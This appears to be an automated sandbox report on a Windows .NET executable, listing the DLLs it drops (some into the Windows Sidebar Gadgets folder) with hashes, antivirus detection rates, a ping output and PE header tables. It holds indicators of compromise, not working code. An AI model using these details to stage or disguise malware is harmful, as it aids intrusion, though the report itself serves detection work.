                                                                                                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):38400
                                                                                                                                                                  Entropy (8bit):5.699005826018714
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):6.057993947082715
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):38912
                                                                                                                                                                  Entropy (8bit):5.679286635687991
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):89600
                                                                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24576
                                                                                                                                                                  Entropy (8bit):5.535426842040921
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32256
                                                                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):50176
                                                                                                                                                                  Entropy (8bit):5.723168999026349
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):46592
                                                                                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):38912
                                                                                                                                                                  Entropy (8bit):5.679286635687991
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):46592
                                                                                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):70144
                                                                                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33792
                                                                                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36352
                                                                                                                                                                  Entropy (8bit):5.668291349855899
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34304
                                                                                                                                                                  Entropy (8bit):5.618776214605176
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):23552
                                                                                                                                                                  Entropy (8bit):5.529329139831718
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):342528
                                                                                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):502
                                                                                                                                                                  Entropy (8bit):4.621947447102293
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:Pew5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:GydUOAokItULVDv
                                                                                                                                                                  MD5:7534E417AE2279B7FC687387A16CC0F6
                                                                                                                                                                  SHA1:1DC46DE6C5C1C9D7A8A00BD2B7D0EF3004C32D41
                                                                                                                                                                  SHA-256:2EF6B6524032C7F3CBBF19FA75E02D822073CA3931A2F57BB2F37860E4D7CB5E
                                                                                                                                                                  SHA-512:AE5E93965515784503CD77DDD777E450B2D20F00FCF65995FCD4D43B62406154C3A9F809293892EC6213AD89DFC82CBD3EF4CE976E22FDB0C9E55BD63772EF3F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..Pinging 358075 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                  File name:zZ1Y43bxxV.exe
                                                                                                                                                                  File size:2'615'296 bytes
                                                                                                                                                                  MD5:cdac978772a7616686c0efe2727ce902
                                                                                                                                                                  SHA1:b316852fe5b1c54c61ffefac1bc9032091d26cb0
                                                                                                                                                                  SHA256:fcfb73997e95a7b8dfd22e302a1b18f8c7075a127bf33f7c9d8bc203984bcdf6
                                                                                                                                                                  SHA512:0aebdbce0e3eb504dfa6e41d5ccc149fa5057e322333d3f10481b286a87c18813bda72f81757bf563b38251db4248d8695e64d37db8464423fb2b68b20d55d35
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  TLSH:79C57D3439FB502AB173EFB58AE4789ADA6FB6B33707585E205103864713A81DDC163E
                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.......(...@................................
                                                                                                                                                                  Icon Hash:90cececece8e8eb0
                                                                                                                                                                  Entrypoint:0x67fe0e
                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                  Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:4
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                  Instruction
                                                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x27fdb4 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x280000 | 0x370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x282000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x27de14 | 0x27e000 | 2388a60dc1b90d01b21fec904d9662f7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
